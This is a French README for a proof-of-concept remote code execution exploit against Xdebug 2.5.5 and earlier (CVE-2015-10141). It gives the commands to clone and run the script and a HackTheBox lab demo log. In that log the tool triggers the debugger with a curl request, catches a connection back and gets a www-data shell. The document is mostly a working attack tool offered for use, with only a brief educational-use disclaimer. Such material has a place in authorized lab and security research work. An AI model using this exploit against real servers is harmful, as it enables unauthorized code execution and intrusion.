
Script d'exploitation Proof-of-Concept pour Xdebug 2.5.5 et versions antérieures (CVE-2015-10141).
Exploit Python personnalisé pour Xdebug ≤ 2.5.5 (CVE-2015-10141).
Ce dépôt contient mon exploit Proof-of-Concept (PoC) pour la vulnérabilité d'exécution de code à distance de Xdebug dans les versions 2.5.5 et antérieures.
Le script exploite le protocole de débogage non authentifié exposé sur le port 9000 pour effectuer une exécution de commande à distance.
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
Lorsque vous y êtes invité, saisissez l'IP cible où Xdebug est hébergé.
Démonstration issue de mon récent write-up HackTheBox Olympus (Medium) :
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
Ce projet est créé à des fins éducatives uniquement.
N'utilisez PAS cet exploit contre des systèmes sans autorisation explicite. Je ne suis pas responsable d'une mauvaise utilisation de ce code.